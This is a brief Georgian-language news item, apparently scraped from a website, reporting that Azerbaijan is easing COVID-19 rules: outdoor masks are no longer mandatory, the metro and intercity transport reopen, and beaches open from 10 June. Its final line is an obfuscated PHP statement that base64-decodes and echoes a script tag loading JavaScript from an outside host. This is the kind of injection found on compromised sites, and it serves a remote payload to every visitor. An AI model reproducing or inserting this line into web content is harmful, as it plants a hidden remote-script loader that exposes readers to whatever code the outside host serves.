celsiusi
ავერსი საქკაბელი
აზერბაიჯანში ეპიდემიოლოგიური მდგომარეობის გაუმჯობესების შედეგად, კორონავირუსის გამო დაწესებული რეგულაციების ნაწილი იხსნება. ამის შესახებ აზერბაიჯანის პრეზიდენტის თანაშემწემ შახმარ მოვსუმოვმა განაცხადა, რომელიც ეკონომიკურ საკითხებს და პრეზიდენტის ადმინისტრაციის ინოვაციური განვითარების განყოფილებას ხელმძღვანელობს.
 
"დღეიდან უქმდება პირბადის სავალდებულო ტარება ღია სივრცეში, აზერბაიჯანის მეტროპალიტენის და საქალაქთაშორისო ტრანსპორტი აღდგება", - აცხადებს მოვსუმოვი. 
 
აღსანიშნავია, რომ პირბადის სავალდებულო ტარება ქუჩებში 2020 წლის 21 ნოემბრიდან იყო დაწესებული.
 
მავსუმოვის თქმით, პირბადის ტარება სავალდებულო რჩება, ტრანსპორტში, რელიგიურ დაწესებულებებში და სავაჭრო ცენტრებში.  ასევე 10 ივნისიდან ზღვის სანაპიროებიც დაიწყებენ მუშაობას. 
1148
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");